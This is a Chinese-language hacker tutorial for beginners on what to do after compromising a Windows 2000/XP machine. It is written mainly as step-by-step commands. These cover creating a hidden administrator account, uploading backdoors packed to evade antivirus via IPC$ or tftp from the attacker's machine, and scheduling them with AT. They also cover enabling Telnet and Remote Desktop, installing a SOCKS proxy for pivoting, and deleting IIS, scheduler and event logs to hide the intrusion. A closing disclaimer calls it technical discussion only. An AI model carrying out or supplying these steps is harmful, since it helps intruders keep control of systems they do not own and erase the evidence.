入侵Windows系統後的工作

入侵系統後的工作
          ◇文/heiyeluren

我們知道入侵一個系統有時候比較的簡單,但是如果要把入侵後的工作做好,不是那麼容易的,有句話不是說"打江山容易,守江山難"嘛,所以入侵一個系統後的工作是很重要,並且需要仔細細緻的去做.本文從這個角度出發來告訴那些菜菜們假如你獲得一個系統的許可權後怎麼做剩下的工作,希望對他們有一些協助.    

說明:(本文所提到的系統如果沒有特別說明都是指windows2000/windowsXP系統)

 

一.獲得許可權(不在討論的範圍,我們只討論入侵系統後的該做的事情)

二.建立超級許可權使用者
(1)建立使用者:
如:net user system$ hacker /add
net localgroup administrators system$ /add
說明:上面的兩個命令就是建立一個名字叫"system$",密碼為"hacker"的超級許可權使用者
(2) 複製超級使用者:
可以使用CA工具來實現超級使用者的可隆了,前提是只要擁有目標系統的管理員權限得帳號和密碼.
ca //ip administrator password IUSR_name password
說明: administrator--管理員帳號  password--管理員帳號的密碼   
IUSR_name--系統已經存在的較低許可權的使用者  password--複製使用者的密碼
cca:檢查複製結果的工具.
cca //ip user password
user:被複製的帳號
password:密碼

三.建立後門
(1)上傳後門程式(方法較多,只說常用的兩種):
上傳後門比如wollf,winshell等常用的後門,最好把後門加一個殼,比如用UPX或者是ASPack等加殼,就不容易被病毒防火牆給查殺.

把後門上傳的方法:
(a)使用IPC$: 先和對方建立一個串連: 
 net use //對方IP地址/ipc$ "密碼" /user:"使用者名稱"
建立成功後就可以上傳後門:
 copy c:/hack/wollf.exe //IP/admin$
 說明:把你C盤下的wollf後門傳到對方的x:/winnt下,或者是windows目錄下
(b)使用tftp:  前提是你進入了對方的系統,比如你通過telnet進入了對方系統,就
可以在對方的shell下從你的機器中傳後門到對方的系統:
  tftp -i  你的IP get wollf.exe
說明:把你機器中的wollf.exe下載到對方的系統目錄下,前提是對方沒有禁止tftp並且你有獨立的IP地址(區域網路的機器不行),你自己的機器開啟tftpd32這個ftp工具,它就會監聽你的69連接埠的串連,然後你就可以在對方的機器上來下載你機器的東西.

 (2)運行後門: 
(a)使用AT命令:  
先獲得對方系統的時間: net time //對方的IP
的到對方的時間後就使用AT命令: at //對方IP 後門啟動並執行時間 後門所在對方系統的路徑
例: at //192.168.0.1 11:02 c:/winnt/system32/wollf.exe
注意:你要執行AT命令,前提是你與對方建立了IPC$串連,並且你獲得對方系統的時間後,你運行後門的時    間必須要後幾分鐘.除了可以使用AT命令之後,還可以使用一款工具叫psexec.exe來實現AT的功能.
(b)使用"流光"的"種植者"來實現拷備和運行後門,這個方法你可以參考"流光"的協助檔案
(c)直接運行後門:
你比如登陸了對方的系統,比如你使用Telnet進入了對方的系統後就可以直接運行了.
假如對方沒有開Telnet,那麼我們就可以幫它開啟.  
開啟對方的Telnet的方法:
我們可以使用opentelnet.exe這個工具來實現,前提是必須具有目標系統的管理員權限和開了IPC$,
命令如下:
opentelnet //ip username password NTLMauthor Telnetport
說明: //ip--目標IP  username--使用者名稱   password--密碼
NTLMauthor--NTLM的驗證方式   Telnetport--連接埠
驗證方式有:0:代表不使用NTLM驗證 1:代表先嘗試使用NTLM驗證,失敗後用密碼驗證 2:只使用NTLM驗證
執行成功後,就可以使用Telnet 對方IP 連接埠 或者 nc -vv 對方的IP 連接埠 來登陸目標機器了.

四.做Proxy 伺服器
為什麼要做代理我就不用說了吧,我們就說說怎麼做代理吧.
這裡我們用到一個工具skserver.exe,是snake寫的一個代理工具,做跳板不錯!
先寫好一個批處理,內容如下:
@echo ***********************************************
@echo            安裝socket代理的批處理
@echo                by heiyeluren
@echo      CQSN---http://www.hackerxfiles.com/
@echo ***********************************************
@pause
@skserver -install
@echo Install...  Succeed!
@skserver -config port 1983
@echo Set port in 1983... Succeed!
@skserver -config starttype 2
@echo Set starttype is autostart... Succeed!
@net start skserver
@echo Start service... Succeed!
@echo OK... Install End!
@pause
@exit

以上的批處理你可以自己根據情況更改,其中的skserver可以改成你該成後門的名字,不過下面"net start skserver"不能改,這是該工具預設的服務名,連接埠你也可以改成你需要的.把skserver.exe傳到對方的系統後,再運行該批處理,就可以從對方1983連接埠來串連代理,可以通過sockCap來做Proxy 伺服器,最多可以跳254級看誰能找到你,呵呵呵~~~

五.開超級終端
如果對方是win2000 server以上的系統的話,就可以開啟對方的超級終端來盡心更好的遠端控制,大家都說開3389肉雞是極品嘛,現在我們就來試試!~~

(1)手工開終端:
進入目標系統後,在命令提示字元下面輸入下面的內容: (假設系統在C:/winnt下面)
echo [Components] > c:/3389
echo TSEnable = on >> c:/3389
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/3389 /q 
(可以在加上參數/r,可以抑制重新啟動,不加安裝完後就重啟)或者你可以寫好這個檔案,然後傳到對方的系統下:
[Components]
TSEnable = on
儲存為3389檔案,然後運行sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/3389 /q 這個命令,對方重啟後你  就擁有了一個3389的肉雞啦,就可以通過"遠端桌面連線"來串連對方,從windows下控制對方了.

(2)利用工具:
這裡用到一款叫Dixyxs.exe的小工具來開對方的終端.
把該工具上傳到對方的系統中,然後執行該程式:dixyxs.exe後等一會肉雞會自動重啟，重啟後會出現終端服務

六.清除日誌
當你做了這一切之後,那麼你不想三分鐘被查到吧?那麼就應該清除日誌.
windows的日誌有:www日誌,FTP日誌,DNS日誌,安全日誌,系統日誌,應用程式記錄檔等等.

(1)手工清除日誌:
有些日誌是一定要刪除的,比如web,ftp等日誌.

記錄檔預設位置： 
應用程式記錄檔、安全日誌、系統日誌、DNS日誌預設位置：%systemroot%/system32 
/config，預設檔案大小512KB，管理員都會改變這個預設大小。 
安全記錄檔：%systemroot%/system32/config/SecEvent.EVT 
系統記錄檔：%systemroot%/system32/config/SysEvent.EVT 
應用程式記錄檔檔案：%systemroot%/system32/config/AppEvent.EVT 
IIS的FTP日誌預設位置：%systemroot%/system32/logfiles/msftpsvc1/，預設每天一個日誌 
IIS的WWW日誌預設位置：%systemroot%/system32/logfiles/w3svc1/，預設每天一個日誌 
Scheduler服務日誌預設位置：%systemroot%/schedlgu.txt 

我們把相關的服務停止後就可以刪除了:
停止服務: net stop w3svc
然後幾可以刪除日誌,www服務的日誌是在:c:/winnt/system32/LogFiles/W3SVC1目錄下;FTP服務的日誌在c:/winnt/system32/LogFiles/MSFTPSVC1目錄下.然後就可以使用del了:
del c:/winnt/system32/LogFiles/W3SVC1/*.* /q
del c:/winnt/system32/LogFiles/MSFTPSVC1/*.* /q
然後是Scheduler日誌,停止該服務: net stop "task scheduler"
然後del c:/winnt/schedlgu.txt /q就可以了~

像安全日誌,系統日誌,應用程式記錄檔等關聯的服務是Eventlog,該服務是無法停止的,所以如果我們手工刪除這些日誌的話,就要通過一個很慢的方法:
開啟“控制台”的"管理工具"中的"事件檢視器"在菜單的"操作"項有一個名為"串連到另一台電腦"的菜單，點擊它如所示：輸入遠端電腦的IP，然後等上一段時間(根據雙方的網速),然後開啟對方的電腦的"事件檢視器"：選擇遠端電腦的"安全性"日誌，右鍵選擇它的屬性:點擊屬性裡的"清除日誌"按鈕，OK！安全日誌清除完畢!同樣的方法清除"系統"日誌和"應用程式"日誌! 

(2)利用工具刪除日誌
利用工具來刪除那些日誌就簡單多啦!
(A)刪除IIS服務相關的WWW日誌和FTP日誌可以使用CleanIISLog.exe這個小工具.
用法:
先用ipc$管道進行串連:net use //ip/ipc$ "password" /user:""
然後就可以使用下面的命令:
cleaniislog [logfile]|[.] [cleanIP]|.
說明: 清除的記錄檔,.代表所有    清除的日誌中哪個IP地址的記錄,.代表所有IP記錄
舉例:cleaniislog . 127.0.0.1
a.可以清除指定的的IP串連記錄，保留其他IP記錄。
b.當清除成功後，CleanIISLog會在系統日誌中將本身的運行記錄清除。
用法: CleanIISLog <LogFile>|<.> <CleanIP>|<.>
<LogFile>: 指定要處理的記錄檔，如果指定為“.”，則處理所有的記錄檔注意：處理所有記錄檔需要很長的時間）。
<CleanIP>: 指定要清除的IP記錄，如果指定為“.”，則清除所有的IP記錄（不推薦這樣做）。
CleanIISLog只能在本地運行，而且必須具有Administrators許可權。

(B)刪除安全日誌,系統日誌和應用程式記錄檔,可以使用elsave.exe這個小工具.
使用方法:
先用ipc$管道進行串連:net use //ip/ipc$ "password" /user:""
清除目標系統的應用程式記錄檔:
elsave -s //ip -l "application" -C
清除目標系統的系統日誌:
elsave -s //ip -l "system"" -C
清除目標系統的安全日誌:
elsave -s //ip -l "security" -C

(C)logkiller.exe這個工具可以把對方的所有日誌都刪除,包括"應用程式記錄檔","安全日誌"和"系統日誌",IIS的FTP服務，IIS的SMTP服務日誌和IIS的WWW服務日誌,以及計劃任務日誌等日誌.
使用方法:把該工具上傳到對方的系統中後直接運行.
例: c:/winnt/system32/logkiller.exe

七.後面的話

說到這裡,差不多入侵一個系統後該做的工作都差不多了吧.當然,你要做別的工作也是可以的,不是限定非要按照上面的模式的,只不過上面的是一個比較基本常用的模式. 比如你還可以設定VNC等遠端控制軟體或者把肉雞做成你的FTP伺服器等都是可以的,但是前提是你一定要注意安全,不要留下不必要的痕迹.
不知道大家有沒有發現一個情況,就是我們都是使用各式各樣的工具來完成我們的任務的,這樣不誓不罷休好,但是使用了太多的工具的話,對我們的技術並沒有太大的進步,所以希望大家能夠不使用工具就不要使用,比如可以使用手工的就盡量用手工來做,這樣的話你會"知其然,更知所以然",不是很好?
我這篇文章可能講的都是一些比較老的東西了,可能很多高手都不願意看,呵呵呵,我想這個定位是在菜菜級的吧,讓大家能夠不至於在這些小問題上迷惑不解.

聲明: 以上純屬討論技術,如果任何組織或個人利用以上方法違反國家法律,都將受到刑律的制裁,同時該組織或個人的一切行為跟作者無關.